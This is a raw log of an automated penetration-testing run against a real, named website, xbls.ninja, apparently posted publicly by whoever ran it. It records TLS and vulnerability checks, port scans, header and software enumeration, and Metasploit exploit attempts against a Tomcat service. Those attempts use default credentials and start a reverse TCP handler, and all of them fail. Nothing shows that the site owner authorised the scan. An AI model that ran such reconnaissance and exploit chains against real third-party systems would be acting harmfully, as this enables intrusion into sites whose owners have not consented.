- xcca9 ECDHE-ECDSA-CHACHA20-POLY1305 ECDH 253 ChaCha20 256 TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256
- xc02b ECDHE-ECDSA-AES128-GCM-SHA256 ECDH 256 AESGCM 128 TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
- xc023 ECDHE-ECDSA-AES128-SHA256 ECDH 256 AES 128 TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256
- xc009 ECDHE-ECDSA-AES128-SHA ECDH 256 AES 128 TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
- Running client simulations via sockets
- Android 2.3.7 No connection
- Android 4.1.1 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
- Android 4.2.2 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
- Android 4.4.2 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- Android 5.0.0 TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305-OLD, 256 bit ECDH (P-256)
- Android 6.0 TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305-OLD, 256 bit ECDH (P-256)
- Android 7.0 TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305, 253 bit ECDH (X25519)
- Baidu Jan 2015 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
- Chrome 51 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 253 bit ECDH (X25519)
- Edge 13 Win 10 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- Edge 13 Win Phone 10 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- Firefox 49 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- Firefox 49 XP SP3 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- IE 11 Win 10 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- IE 11 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- IE 11 Win 8.1 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- IE 11 Win Phone 8.1 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- IE 11 Win Phone 8.1 Update TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- IE 6 XP No connection
- IE 7 Vista TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
- IE 8 Win 7 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
- IE 8 XP No connection
- Java 6u45 No connection
- Java 7u25 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
- Java 8b132 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- OpenSSL 1.0.1l TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- OpenSSL 1.0.2e TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- Safari 5.1.9 OS X 10.6.8 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
- Safari 6.0.4 OS X 10.8.4 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
- Safari 7 OS X 10.9 TLSv1.2 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
- Safari 8 OS X 10.10 TLSv1.2 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
- Safari 9 iOS 9 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- Safari 9 OS X 10.11 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- Safari 10 OS X 10.12 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- Apple ATS 9 iOS 9 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- Tor 17.0.9 Win 7 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
- Done 2017-07-13 08:16:22 [ 97s] -->> 104.27.135.184:443 (xbls.ninja) <<--
- --------------------------------------------------------------------
- Done testing now all IP addresses (on port 443): 104.27.134.184 104.27.135.184
- ███▄ ▄███▓ ▄▄▄ ██████ ██████ ▄▄▄▄ ██▓ ▓█████ ▓█████ ▓█████▄
- ▓██▒▀█▀ ██▒▒████▄ ▒██ ▒ ▒██ ▒ ▓█████▄ ▓██▒ ▓█ ▀ ▓█ ▀ ▒██▀ ██▌
- ▓██ ▓██░▒██ ▀█▄ ░ ▓██▄ ░ ▓██▄ ▒██▒ ▄██▒██░ ▒███ ▒███ ░██ █▌
- ▒██ ▒██ ░██▄▄▄▄██ ▒ ██▒ ▒ ██▒▒██░█▀ ▒██░ ▒▓█ ▄ ▒▓█ ▄ ░▓█▄ ▌
- ▒██▒ ░██▒ ▓█ ▓██▒▒██████▒▒▒██████▒▒░▓█ ▀█▓░██████▒░▒████▒░▒████▒░▒████▓
- ░ ▒░ ░ ░ ▒▒ ▓▒█░▒ ▒▓▒ ▒ ░▒ ▒▓▒ ▒ ░░▒▓███▀▒░ ▒░▓ ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓ ▒
- ░ ░ ░ ▒ ▒▒ ░░ ░▒ ░ ░░ ░▒ ░ ░▒░▒ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ▒
- ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
- ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
- ░ ░
- + -- --=[MÄŚŚBĻËËĐ V20160303 BŸ 1Ņ3 @ ĊŖÖŴĐŚȞÏËĻĐ - https://crowdshield.com
- + -- --=[Checking for DROWN (SSLv2): 104.27.134.184:443
- + -- --=[Checking for HeartBleed: 104.27.134.184:443
- + -- --=[Checking for OpenSSL CCS: 104.27.134.184:443
- + -- --=[Checking for Poodle (SSLv3): 104.27.134.184:443
- + -- --=[Checking for WinShock (MS14-066): 104.27.134.184:443
- Testing if OpenSSL supports the ciphers we are checking for: YES
- Testing 104.27.134.184:443 for availability of SSL ciphers added in MS14-066...
- Testing cipher DHE-RSA-AES256-GCM-SHA384: UNSUPPORTED
- Testing cipher DHE-RSA-AES128-GCM-SHA256: UNSUPPORTED
- Testing cipher AES256-GCM-SHA384: UNSUPPORTED
- Testing cipher AES128-GCM-SHA256: UNSUPPORTED
- Testing if IIS is running on port 443: NO
- Checking if target system is running Windows Server 2012 or later...
- Testing cipher ECDHE-RSA-AES256-SHA384: UNSUPPORTED
- Testing cipher ECDHE-RSA-AES256-SHA: UNSUPPORTED
- 104.27.134.184:443 is patched: NO
- + -- --=[Scan Complete!
- + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +
- + -- --=[Checking if X-Content options are enabled on xbls.ninja...
- x-content-type-options: nosniff
- + -- --=[Checking if X-Frame options are enabled on xbls.ninja...
- x-frame-options: SAMEORIGIN
- + -- --=[Checking if X-XSS-Protection header is enabled on xbls.ninja...
- x-xss-protection: 1; mode=block
- + -- --=[Checking HTTP methods on xbls.ninja...
- + -- --=[Checking if TRACE method is enabled on xbls.ninja...
- + -- --=[Checking for META tags on xbls.ninja...
- <meta name="twitter:title" content="NiNJA: the ORIGINAL XBLS – #1 JTAG/RGH XBL online service!"/>
- <meta name="twitter:site" content="@XBLS_NiNJA"/>
- <meta name="twitter:image" content="https://xbls.ninja/aim/exbls_ed9?on_url=https://xbls.ninja/images/content/online.png&off_url=https://xbls.ninja/images/content/offline.png"/>
- <meta name="twitter:creator" content="@XBLS_NiNJA"/>
- <meta property="DC.date.issued" content="2015-06-08T06:11:40-06:00"/>
- <meta name="generator" content="WordPress 4.8"/>
- <meta name="generator" content="WooCommerce 2.6.14"/>
- <meta name="generator" content="Powered by Visual Composer - drag and drop page builder for WordPress."/>
- <!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="https://xbls.ninja/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css" media="screen"><![endif]--><meta name="generator" content="Powered by Slider Revolution 5.2.6 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface."/>
- <meta name="msapplication-TileImage" content="https://xbls.ninja/wp-content/uploads/2015/06/favicon.png"/>
- + -- --=[Checking for open proxy on xbls.ninja...
- + -- --=[Enumerating software on xbls.ninja...
- server: cloudflare-nginx
- + -- --=[Checking if Strict-Transport-Security is enabled on xbls.ninja...
- strict-transport-security: max-age=15552000
- + -- --=[Checking for Flash cross-domain policy on xbls.ninja...
- </script>
- <script type='text/javascript' src='https://xbls.ninja/wp-content/plugins/bwp-minify/min/?f=wp-content/plugins/sb-woocommerce-email-verification/assets/js/sb.js,wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js,wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js,wp-content/plugins/woocommerce/assets/js/jquery-cookie/jquery.cookie.min.js,wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js,wp-content/themes/patti/js/jquery.lazyload.js,wp-content/themes/patti/js/hoverIntent.js,wp-content/themes/patti/js/scripts-bottom.js,wp-content/themes/patti/js/jquery.isotope.min.js,wp-content/themes/patti/js/custom/custom-isotope-portfolio.js,wp-content/themes/patti/js/custom/custom-isotope-blog.js,wp-content/themes/patti/js/custom/custom-nav.js,wp-content/themes/patti/js/custom/custom.js,wp-includes/js/wp-embed.min.js&ver=1497937331'></script>
- <script> </script>
- <!--[if lt IE 9]>
- <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
- <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
- <![endif]-->
- </body>
- </html>
- + -- --=[Checking for Silverlight cross-domain policy on xbls.ninja...
- </script>
- <script type='text/javascript' src='https://xbls.ninja/wp-content/plugins/bwp-minify/min/?f=wp-content/plugins/sb-woocommerce-email-verification/assets/js/sb.js,wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js,wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js,wp-content/plugins/woocommerce/assets/js/jquery-cookie/jquery.cookie.min.js,wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js,wp-content/themes/patti/js/jquery.lazyload.js,wp-content/themes/patti/js/hoverIntent.js,wp-content/themes/patti/js/scripts-bottom.js,wp-content/themes/patti/js/jquery.isotope.min.js,wp-content/themes/patti/js/custom/custom-isotope-portfolio.js,wp-content/themes/patti/js/custom/custom-isotope-blog.js,wp-content/themes/patti/js/custom/custom-nav.js,wp-content/themes/patti/js/custom/custom.js,wp-includes/js/wp-embed.min.js&ver=1497937331'></script>
- <script> </script>
- <!--[if lt IE 9]>
- <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
- <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
- <![endif]-->
- </body>
- </html>
- + -- --=[Checking for HTML5 cross-origin resource sharing on xbls.ninja...
- + -- --=[Retrieving robots.txt on xbls.ninja...
- User-agent: *
- Allow: /
- + -- --=[Retrieving sitemap.xml on xbls.ninja...
- + -- --=[Checking cookie attributes on xbls.ninja...
- set-cookie: __cfduid=d84735e5459b26e0d084d9ad4ffa7d0911499926633; expires=Fri, 13-Jul-18 06:17:13 GMT; path=/; domain=.xbls.ninja; HttpOnly
- + -- --=[Checking for ASP.NET Detailed Errors on xbls.ninja...
- <body class="error404 wpb-js-composer js-comp-ver-5.1.1 vc_responsive">
- <h1 class="aligncenter">Error 404 - Not Found</h1>
- <body class="error404 wpb-js-composer js-comp-ver-5.1.1 vc_responsive">
- <h1 class="aligncenter">Error 404 - Not Found</h1>
- + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +
- - Nikto v2.1.6
- ---------------------------------------------------------------------------
- + Target IP: 104.27.134.184
- + Target Hostname: xbls.ninja
- + Target Port: 443
- ---------------------------------------------------------------------------
- + SSL Info: Subject: /OU=Domain Control Validated/OU=PositiveSSL Multi-Domain/CN=sni87911.cloudflaressl.com
- Ciphers: ECDHE-ECDSA-CHACHA20-POLY1305
- Issuer: /C=GB/ST=Greater Manchester/L=Salford/O=COMODO CA Limited/CN=COMODO ECC Domain Validation Secure Server CA 2
- + Start Time: 2017-07-13 08:16:42 (GMT0)
- ---------------------------------------------------------------------------
- + Server: cloudflare-nginx
- + Cookie __cfduid created without the secure flag
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + Uncommon header 'cf-ray' found, with contents: 37da1e40fb36763c-ARN
- + All CGI directories 'found', use '-C none' to test none
- + The Content-Encoding header is set to "deflate" this may mean that the server is vulnerable to the BREACH attack.
- + ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect: SSL negotiation failed: error:14094410:SSL routines:ssl3_read_bytes:sslv3 alert handshake failure at /var/lib/nikto/plugins/LW2.pm line 5157.
- at /var/lib/nikto/plugins/LW2.pm line 5157.
- ; at /var/lib/nikto/plugins/LW2.pm line 5157.
- + Scan terminated: 20 error(s) and 4 item(s) reported on remote host
- + End Time: 2017-07-13 08:17:08 (GMT0) (26 seconds)
- ---------------------------------------------------------------------------
- + 1 host(s) tested
- + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +
- QNetworkReplyImplPrivate::error: Internal problem, this method must only be called once.
- content-type missing in HTTP POST, defaulting to application/x-www-form-urlencoded. Use QNetworkRequest::setHeader() to fix this problem.
- [+] Screenshot saved to /usr/share/sniper/loot/screenshots/xbls.ninja-port443.jpg
- + -- --=[Port 445 closed... skipping.
- + -- --=[Port 512 closed... skipping.
- + -- --=[Port 513 closed... skipping.
- + -- --=[Port 514 closed... skipping.
- + -- --=[Port 623 closed... skipping.
- + -- --=[Port 624 closed... skipping.
- + -- --=[Port 1099 closed... skipping.
- + -- --=[Port 1433 closed... skipping.
- + -- --=[Port 2049 closed... skipping.
- + -- --=[Port 2121 closed... skipping.
- + -- --=[Port 3306 closed... skipping.
- + -- --=[Port 3310 closed... skipping.
- + -- --=[Port 3128 closed... skipping.
- + -- --=[Port 3389 closed... skipping.
- + -- --=[Port 3632 closed... skipping.
- + -- --=[Port 4443 opened... running tests...
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://xbls.ninja:4443
- ERROR:root:Site http://xbls.ninja:4443 appears to be down
- /usr/share/whatweb/lib/target.rb:189: warning: constant ::TimeoutError is deprecated
- http://xbls.ninja:4443 ERROR: Timed out execution expired
- __ ______ _____
- \ \/ / ___|_ _|
- \ /\___ \ | |
- / \ ___) || |
- /_/\_|____/ |_|
- + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
- + -- --=[Target: xbls.ninja:4443
- + -- --=[Port is closed!
- Version: 1.11.10-static
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- ERROR: Could not open a connection to host xbls.ninja on port 4443.
- AVAILABLE PLUGINS
- -----------------
- PluginCertInfo
- PluginSessionRenegotiation
- PluginHSTS
- PluginChromeSha1Deprecation
- PluginOpenSSLCipherSuites
- PluginCompression
- PluginSessionResumption
- PluginHeartbleed
- CHECKING HOST(S) AVAILABILITY
- -----------------------------
- xbls.ninja:4443 => WARNING: Could not connect (timeout); discarding corresponding tasks.
- SCAN COMPLETED IN 10.05 S
- -------------------------
- ███▄ ▄███▓ ▄▄▄ ██████ ██████ ▄▄▄▄ ██▓ ▓█████ ▓█████ ▓█████▄
- ▓██▒▀█▀ ██▒▒████▄ ▒██ ▒ ▒██ ▒ ▓█████▄ ▓██▒ ▓█ ▀ ▓█ ▀ ▒██▀ ██▌
- ▓██ ▓██░▒██ ▀█▄ ░ ▓██▄ ░ ▓██▄ ▒██▒ ▄██▒██░ ▒███ ▒███ ░██ █▌
- ▒██ ▒██ ░██▄▄▄▄██ ▒ ██▒ ▒ ██▒▒██░█▀ ▒██░ ▒▓█ ▄ ▒▓█ ▄ ░▓█▄ ▌
- ▒██▒ ░██▒ ▓█ ▓██▒▒██████▒▒▒██████▒▒░▓█ ▀█▓░██████▒░▒████▒░▒████▒░▒████▓
- ░ ▒░ ░ ░ ▒▒ ▓▒█░▒ ▒▓▒ ▒ ░▒ ▒▓▒ ▒ ░░▒▓███▀▒░ ▒░▓ ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓ ▒
- ░ ░ ░ ▒ ▒▒ ░░ ░▒ ░ ░░ ░▒ ░ ░▒░▒ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ▒
- ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
- ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
- ░ ░
- + -- --=[MÄŚŚBĻËËĐ V20160303 BŸ 1Ņ3 @ ĊŖÖŴĐŚȞÏËĻĐ - https://crowdshield.com
- + -- --=[Scan Complete!
- - Nikto v2.1.6
- ---------------------------------------------------------------------------
- + No web server found on xbls.ninja:4443
- ---------------------------------------------------------------------------
- + 0 host(s) tested
- Starting Nmap 7.50 ( https://nmap.org ) at 2017-07-13 08:25 UTC
- Nmap scan report for xbls.ninja (104.27.135.184)
- Host is up (0.012s latency).
- Other addresses for xbls.ninja (not scanned): 104.27.134.184
- PORT STATE SERVICE VERSION
- 4443/tcp filtered pharos
- Too many fingerprints match this host to give specific OS details
- Network Distance: 7 hops
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 REMOVED FOR MY SECURITY
- 2 REMOVED FOR MY SECURITY
- 3 REMOVED FOR MY SECURITY
- 4 REMOVED FOR MY SECURITY
- 5 REMOVED FOR MY SECURITY
- 6 REMOVED FOR MY SECURITY
- 7 REMOVED FOR MY SECURITY
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 3.91 seconds
- + -- --=[Port 5432 closed... skipping.
- + -- --=[Port 5800 closed... skipping.
- + -- --=[Port 5900 closed... skipping.
- + -- --=[Port 5984 closed... skipping.
- + -- --=[Port 6000 closed... skipping.
- + -- --=[Port 6667 closed... skipping.
- + -- --=[Port 8000 closed... skipping.
- + -- --=[Port 8100 closed... skipping.
- + -- --=[Port 8080 opened... running tests...
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://xbls.ninja:8080
- ERROR:root:Site http://xbls.ninja:8080 appears to be down
- /usr/share/whatweb/lib/target.rb:189: warning: constant ::TimeoutError is deprecated
- http://xbls.ninja:8080 ERROR: Timed out Net::ReadTimeout
- __ ______ _____
- \ \/ / ___|_ _|
- \ /\___ \ | |
- / \ ___) || |
- /_/\_|____/ |_|
- + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
- + -- --=[Target: xbls.ninja:8080
- + -- --=[Site not vulnerable to Cross-Site Tracing!
- + -- --=[Site not vulnerable to Host Header Injection!
- Traceback (most recent call last):
- File "/usr/bin/xsstracer", line 141, in <module>
- main(sys.argv)
- File "/usr/bin/xsstracer", line 120, in main
- data2 = s2.recv(1024)
- socket.timeout: timed out
- Version: 1.11.10-static
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- Testing SSL server xbls.ninja on port 8080 using SNI name xbls.ninja
- TLS Fallback SCSV:
- Server does not support TLS Fallback SCSV
- TLS renegotiation:
- Session renegotiation not supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.0 not vulnerable to heartbleed
- Supported Server Cipher(s):
- ███▄ ▄███▓ ▄▄▄ ██████ ██████ ▄▄▄▄ ██▓ ▓█████ ▓█████ ▓█████▄
- ▓██▒▀█▀ ██▒▒████▄ ▒██ ▒ ▒██ ▒ ▓█████▄ ▓██▒ ▓█ ▀ ▓█ ▀ ▒██▀ ██▌
- ▓██ ▓██░▒██ ▀█▄ ░ ▓██▄ ░ ▓██▄ ▒██▒ ▄██▒██░ ▒███ ▒███ ░██ █▌
- ▒██ ▒██ ░██▄▄▄▄██ ▒ ██▒ ▒ ██▒▒██░█▀ ▒██░ ▒▓█ ▄ ▒▓█ ▄ ░▓█▄ ▌
- ▒██▒ ░██▒ ▓█ ▓██▒▒██████▒▒▒██████▒▒░▓█ ▀█▓░██████▒░▒████▒░▒████▒░▒████▓
- ░ ▒░ ░ ░ ▒▒ ▓▒█░▒ ▒▓▒ ▒ ░▒ ▒▓▒ ▒ ░░▒▓███▀▒░ ▒░▓ ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓ ▒
- ░ ░ ░ ▒ ▒▒ ░░ ░▒ ░ ░░ ░▒ ░ ░▒░▒ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ▒
- ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
- ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
- ░ ░
- + -- --=[MÄŚŚBĻËËĐ V20160303 BŸ 1Ņ3 @ ĊŖÖŴĐŚȞÏËĻĐ - https://crowdshield.com
- + -- --=[Checking for DROWN (SSLv2): 104.27.134.184:8080
- + -- --=[Checking for HeartBleed: 104.27.134.184:8080
- + -- --=[Checking for OpenSSL CCS: 104.27.134.184:8080
- + -- --=[Checking for Poodle (SSLv3): 104.27.134.184:8080
- + -- --=[Checking for WinShock (MS14-066): 104.27.134.184:8080
- Testing if OpenSSL supports the ciphers we are checking for: YES
- Testing 104.27.134.184:8080 for availability of SSL ciphers added in MS14-066...
- Testing cipher DHE-RSA-AES256-GCM-SHA384: UNSUPPORTED
- Testing cipher DHE-RSA-AES128-GCM-SHA256: UNSUPPORTED
- Testing cipher AES256-GCM-SHA384: UNSUPPORTED
- Testing cipher AES128-GCM-SHA256: UNSUPPORTED
- Checking if target system is running Windows Server 2012 or later...
- Testing cipher ECDHE-RSA-AES256-SHA384: UNSUPPORTED
- Testing cipher ECDHE-RSA-AES256-SHA: UNSUPPORTED
- 104.27.134.184:8080 is patched: NO
- + -- --=[Scan Complete!
- - Nikto v2.1.6
- ---------------------------------------------------------------------------
- + Target IP: 104.27.135.184
- + Target Hostname: xbls.ninja
- + Target Port: 8080
- + Start Time: 2017-07-13 08:26:31 (GMT0)
- ---------------------------------------------------------------------------
- + Server: cloudflare-nginx
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + Uncommon header 'cf-ray' found, with contents: 37da2ca1c4d1871b-ARN
- + All CGI directories 'found', use '-C none' to test none
- + Server banner has changed from 'cloudflare-nginx' to '-nginx' which may suggest a WAF, load balancer or proxy is in place
- + 26099 requests: 0 error(s) and 2 item(s) reported on remote host
- + End Time: 2017-07-13 08:34:36 (GMT0) (485 seconds)
- ---------------------------------------------------------------------------
- + 1 host(s) tested
- Starting Nmap 7.50 ( https://nmap.org ) at 2017-07-13 08:35 UTC
- Nmap scan report for xbls.ninja (104.27.135.184)
- Host is up (0.013s latency).
- Other addresses for xbls.ninja (not scanned): 104.27.134.184
- PORT STATE SERVICE VERSION
- 8080/tcp open http Cloudflare nginx
- |_http-server-header: cloudflare-nginx
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: general purpose
- Running (JUST GUESSING): Linux 3.X|4.X|2.6.X (93%)
- OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:2.6
- Aggressive OS guesses: Linux 3.12 - 4.4 (93%), Linux 3.18 (88%), Linux 2.6.18 - 2.6.22 (86%), Linux 3.2 (85%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 7 hops
- TRACEROUTE (using port 8080/tcp)
- HOP RTT ADDRESS
- 1 REMOVED FOR MY SECURITY
- 2 REMOVED FOR MY SECURITY
- 3 REMOVED FOR MY SECURITY
- 4 REMOVED FOR MY SECURITY
- 5 REMOVED FOR MY SECURITY
- 6 REMOVED FOR MY SECURITY
- 7 REMOVED FOR MY SECURITY
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 20.62 seconds
- , ,
- / \
- ((__---,,,---__))
- (_) O O (_)_________
- \ _ / |\
- o_o \ M S F | \
- \ _____ | *
- ||| WW|||
- ||| |||
- =[ metasploit v4.14.28-dev ]
- + -- --=[ 1662 exploits - 951 auxiliary - 293 post ]
- + -- --=[ 486 payloads - 40 encoders - 9 nops ]
- + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
- RHOST => xbls.ninja
- [-] WAR file not found
- [*] Auxiliary module execution completed
- RHOSTS => xbls.ninja
- [!] RHOST is not a valid option for this module. Did you mean RHOSTS?
- RHOST => xbls.ninja
- RPORT => 8080
- [*] Scanned 1 of 2 hosts (50% complete)
- [*] Scanned 2 of 2 hosts (100% complete)
- [*] Auxiliary module execution completed
- [*] Attempting to connect to 104.27.135.184:8080
- [+] No File(s) found
- [*] Scanned 1 of 2 hosts (50% complete)
- [*] Attempting to connect to 104.27.134.184:8080
- [+] No File(s) found
- [*] Scanned 2 of 2 hosts (100% complete)
- [*] Auxiliary module execution completed
- [*] 104.27.135.184:8080 - /admin/j_security_check - Checking j_security_check...
- [*] 104.27.135.184:8080 - /admin/j_security_check - Server returned: 403
- [-] http://104.27.135.184:8080/admin/j_security_check - Unable to enumerate users with this URI
- [*] Scanned 1 of 2 hosts (50% complete)
- [*] 104.27.134.184:8080 - /admin/j_security_check - Checking j_security_check...
- [*] 104.27.134.184:8080 - /admin/j_security_check - Server returned: 403
- [-] http://104.27.134.184:8080/admin/j_security_check - Unable to enumerate users with this URI
- [*] Scanned 2 of 2 hosts (100% complete)
- [*] Auxiliary module execution completed
- [-] 104.27.134.184:8080 - Authorization not requested
- [*] Scanned 1 of 2 hosts (50% complete)
- [-] 104.27.135.184:8080 - Authorization not requested
- [*] Scanned 2 of 2 hosts (100% complete)
- [*] Auxiliary module execution completed
- [*] Started reverse TCP handler on 192.168.0.2:4444
- [*] Attempting to automatically select a target...
- [-] Failed: Error requesting /manager/serverinfo
- [-] Exploit aborted due to failure: no-target: Unable to automatically select a target
- [*] Exploit completed, but no session was created.
- USERNAME => tomcat
- PASSWORD => tomcat
- [*] Started reverse TCP handler on 192.168.0.2:4444
- [*] Retrieving session ID and CSRF token...
- [-] Exploit aborted due to failure: unknown: Unable to access the Tomcat Manager
- [*] Exploit completed, but no session was created.
- + -- --=[Port 8180 closed... skipping.
- + -- --=[Port 8443 opened... running tests...
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://xbls.ninja:8443
- The site http://xbls.ninja:8443 is behind a CloudFlare
- Number of requests: 1
- http://xbls.ninja:8443 [400 Bad Request] CloudFlare, Country[UNITED STATES][US], HTTPServer[cloudflare-nginx], IP[104.27.134.184], Title[400 The plain HTTP request was sent to HTTPS port], UncommonHeaders[cf-ray]
- __ ______ _____
- \ \/ / ___|_ _|
- \ /\___ \ | |
- / \ ___) || |
- /_/\_|____/ |_|
- + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
- + -- --=[Target: xbls.ninja:8443
- + -- --=[Site not vulnerable to Cross-Site Tracing!
- + -- --=[Site not vulnerable to Host Header Injection!
- + -- --=[Site vulnerable to Cross-Frame Scripting!
- + -- --=[Site vulnerable to Clickjacking!
- HTTP/1.1 405 Not Allowed
- Server: cloudflare-nginx
- Date: Thu, 13 Jul 2017 06:37:10 GMT
- Content-Type: text/html
- Content-Length: 177
- Connection: close
- CF-RAY: -
- <html>
- <head><title>405 Not Allowed</title></head>
- <body bgcolor="white">
- <center><h1>405 Not Allowed</h1></center>
- <hr><center>cloudflare-nginx</center>
- </body>
- </html>
- HTTP/1.1 400 Bad Request
- Server: cloudflare-nginx
- Date: Thu, 13 Jul 2017 06:37:10 GMT
- Content-Type: text/html
- Content-Length: 275
- Connection: close
- CF-RAY: -
- <html>
- <head><title>400 The plain HTTP request was sent to HTTPS port</title></head>
- <body bgcolor="white">
- <center><h1>400 Bad Request</h1></center>
- <center>The plain HTTP request was sent to HTTPS port</center>
- <hr><center>cloudflare-nginx</center>
- </body>
- </html>
- Version: 1.11.10-static
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- Testing SSL server xbls.ninja on port 8443 using SNI name xbls.ninja
